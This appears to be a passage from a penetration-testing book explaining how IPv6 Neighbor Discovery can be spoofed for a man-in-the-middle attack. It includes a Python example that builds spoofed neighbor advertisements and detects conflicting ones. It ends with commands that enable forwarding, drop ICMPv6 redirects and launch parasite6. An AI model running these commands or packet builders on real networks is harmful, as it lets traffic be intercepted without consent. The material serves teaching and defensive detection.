Hands-On Penetration Testing on Windows

IPv6 man-in-the-middle – attacking your neighbors

By now, you've probably had enough ARP to give you a headache. Don't worry, IPv6 has a different process for resolving IPv6 addresses to link-layer addresses. However, it seems the designers didn't want us to be bored: we can still spoof and manipulate the procedure, just as with IPv4 and ARP, and so establish a man-in-the-middle condition. Let's take a look at how Neighbor Discovery Protocol (NDP) resolution works in IPv6, and then we'll attack it with THC-IPV6's parasite6.

You'll recall from sniffing ARP traffic that there are two parts: who has <IP address>? Tell <host> and <IP address> is at <MAC address>. In IPv6, these two parts are called, respectively, neighbor solicitation (NS) and neighbor advertisement (NA). First, the node with the query sends an NS message to the solicited-node multicast address of the address it wants to resolve (ff02::1:ffXX:XXXX, formed from the low 24 bits of that address), not to the all-nodes address ff02::1. Only nodes that have joined that group, which in practice means the owner of the queried address, need to process the NS, but on a switch without MLD snooping the frame is flooded to every port, so an attacker sniffing the segment still sees every NS that goes by, which is exactly what parasite6 relies on. The subject node then replies to the requestor with an NA message. All of these messages are carried over ICMPv6 (NS is type 135, NA is type 136).

It's that straightforward. Where the two protocols differ is in how replies are processed. In IPv4, most stacks accept an ARP reply they never asked for (a gratuitous ARP) and update their table on the spot, and when two replies arrive, the last one wins; that is what lets the attacker preempt any resolution request and keep the victim's table pointing at the wrong MAC. In IPv6 ND, the real target still answers the NS with an NA directed at the requestor; in short, the requestor ends up receiving two NA messages for the same query, pointing at two different link-layer addresses, one of which is the attacker's. Fun, right? Here's where you'll chuckle: the NA carries an override (O) flag, and when it is set, the recipient is told to, you guessed it, overwrite whatever link-layer address it already has cached for that target (without the flag, a conflicting NA at most marks the existing entry as stale). The requestor gets two answers: hi, I'm the device you're looking for, followed immediately by, don't listen to that guy, it's actually me. Whichever NA with the override flag arrives last is the one that sticks, which is why the tool is run in loop mode below, so that it keeps re-asserting its claim.
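
To make the NS/NA exchange and the override-flag decision concrete, here is an added example in pure Python (it is not code from the book, from THC-IPV6, or from parasite6). It derives the solicited-node multicast address an NS is sent to, builds raw ICMPv6 NA messages with the target link-layer address option and a correct checksum, models the receiver-side neighbor-cache update of RFC 4861 section 7.2.5 in reduced form, and flags a target that was advertised with two different MACs, which is the on-the-wire symptom described above. The addresses and MACs (fe80::beef, fe80::1, 00:11:22:33:44:55, de:ad:be:ef:00:01) are constructed for the demonstration.

```python
"""NA construction, parsing and the override-flag decision (added example, not from the book).

Addresses and MACs below are constructed. apply_na() is a reduced model of
RFC 4861 section 7.2.5, keeping only the cases a spoofing attack exercises.
"""
import ipaddress
import struct

ND_NEIGHBOR_ADVERT = 136            # ICMPv6 type for NA (NS is 135)
FLAG_ROUTER, FLAG_SOLICITED, FLAG_OVERRIDE = 0x80, 0x40, 0x20
OPT_TARGET_LLADDR = 2               # target link-layer address option
NA_LEN = 32                         # 24-byte NA plus one 8-byte option


def solicited_node_multicast(addr):
    """ff02::1:ffXX:XXXX, built from the low 24 bits of addr (RFC 4291 2.7.1)."""
    low24 = int(ipaddress.IPv6Address(addr)) & 0xFFFFFF
    return str(ipaddress.IPv6Address((0xFF02 << 112) | 0x1FF000000 | low24))


def icmpv6_checksum(src, dst, message):
    """Internet checksum over the IPv6 pseudo-header plus the ICMPv6 message."""
    pseudo = (ipaddress.IPv6Address(src).packed + ipaddress.IPv6Address(dst).packed
              + struct.pack("!IxxxB", len(message), 58))   # upper-layer length, next header 58
    data = pseudo + message
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_na(src, dst, target, mac, solicited=True, override=True, router=False):
    """Serialise an NA for `target` that claims link-layer address `mac`."""
    flags = ((FLAG_ROUTER if router else 0) | (FLAG_SOLICITED if solicited else 0)
             | (FLAG_OVERRIDE if override else 0))
    body = struct.pack("!BBHB3x16sBB6s", ND_NEIGHBOR_ADVERT, 0, 0, flags,
                       ipaddress.IPv6Address(target).packed,
                       OPT_TARGET_LLADDR, 1, bytes.fromhex(mac.replace(":", "")))
    checksum = icmpv6_checksum(src, dst, body)
    return body[:2] + struct.pack("!H", checksum) + body[4:]


def parse_na(packet):
    """Pull target, advertised MAC and flags out of a raw NA."""
    (typ, _code, _csum, flags, target,
     opt_type, _opt_len, lladdr) = struct.unpack("!BBHB3x16sBB6s", packet[:NA_LEN])
    if typ != ND_NEIGHBOR_ADVERT or opt_type != OPT_TARGET_LLADDR:
        raise ValueError("not a neighbor advertisement with a target link-layer option")
    return {"target": str(ipaddress.IPv6Address(target)),
            "mac": ":".join(f"{b:02x}" for b in lladdr),
            "solicited": bool(flags & FLAG_SOLICITED),
            "override": bool(flags & FLAG_OVERRIDE)}


def apply_na(cache, na):
    """Receiver-side cache update. cache maps target -> (mac, state).

    Returns the entry after processing, or None when the NA is for a target
    the receiver never asked about (an unsolicited NA creates no entry).
    """
    entry = cache.get(na["target"])
    if entry is None:
        return None
    old_mac, state = entry
    fresh = "REACHABLE" if na["solicited"] else "STALE"
    if state == "INCOMPLETE":
        new = (na["mac"], fresh)                       # first answer to our NS: take it
    elif na["mac"] != old_mac and not na["override"]:
        new = (old_mac, "STALE" if state == "REACHABLE" else state)  # O clear: keep old MAC
    else:
        new = (na["mac"], fresh)                       # O set (or same MAC): overwrite
    cache[na["target"]] = new
    return new


def detect_conflicts(packets):
    """Flag any target that is advertised with more than one MAC in a capture."""
    first_seen, alerts = {}, []
    for packet in packets:
        na = parse_na(packet)
        known = first_seen.setdefault(na["target"], na["mac"])
        if known != na["mac"]:
            alerts.append((na["target"], known, na["mac"], na["override"]))
    return alerts


def demo():
    """Constructed exchange: victim resolves its gateway, gets a genuine NA, then a spoofed one."""
    victim, gateway = "fe80::beef", "fe80::1"
    real_mac, attacker_mac = "00:11:22:33:44:55", "de:ad:be:ef:00:01"
    genuine = build_na(gateway, victim, gateway, real_mac)
    spoofed = build_na(gateway, victim, gateway, attacker_mac, override=True)
    polite = build_na(gateway, victim, gateway, attacker_mac, override=False)

    cache = {gateway: (None, "INCOMPLETE")}            # victim has just sent its NS
    apply_na(cache, parse_na(genuine))
    with_override = apply_na(cache, parse_na(spoofed))

    cache = {gateway: (None, "INCOMPLETE")}
    apply_na(cache, parse_na(genuine))
    without_override = apply_na(cache, parse_na(polite))

    return with_override, without_override, detect_conflicts([genuine, spoofed])


if __name__ == "__main__":
    print("NS for fe80::1 goes to", solicited_node_multicast("fe80::1"))
    print(demo())
```

Running demo() shows the two outcomes side by side: with the override flag set, the spoofed NA replaces the gateway's real MAC in the victim's cache and the entry is marked REACHABLE; with the flag clear, the victim keeps the genuine MAC and merely demotes the entry to STALE. The detect_conflicts() pass over the same two packets is the detection angle: a single target advertised from two MACs within one capture, with the override bit on the second, is the signature a defender should alert on.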

Our handy NDP spoofer is called parasite6. As with ARP spoofing, we need to enable packet forwarding so that the intercepted traffic actually passes through our interface, rather than being dropped, once the spoofing begins; but there's another setup step required: suppressing ICMPv6 redirects. There are scenarios in which a device forwarding IPv6 traffic (that would be you, the attacker) is required to send a redirect back to the source, effectively telling the source to send its traffic somewhere else.

One of the conditions that triggers a redirect is forwarding a packet out of the same interface it arrived on, which is exactly what a man-in-the-middle on a single segment does. If the kernel sends that redirect, the victim learns the real next hop and starts bypassing us, so we add an ip6tables rule to drop outgoing redirects as well. Our friendly parasite6 tool is nice enough to remind us of both steps at launch, just in case we forgot.

Keep an eye out for that pesky number 6 when working with these protocols: ping -6, nmap -6, and ip6tables instead of iptables, and so on. There is a lot of conceptual and functional overlap, so be careful. The three commands below enable IPv6 forwarding, drop any ICMPv6 redirects our host would otherwise emit, and start parasite6 in loop mode on wlan0:
# sysctl -w net.ipv6.conf.all.forwarding=1
# ip6tables -I OUTPUT -p icmpv6 --icmpv6-type redirect -j DROP
# atk6-parasite6 -l -R wlan0

The following screenshot illustrates the output of the preceding commands:

Now, the attack is active and you can progress to the next stage of intercept and manipulation.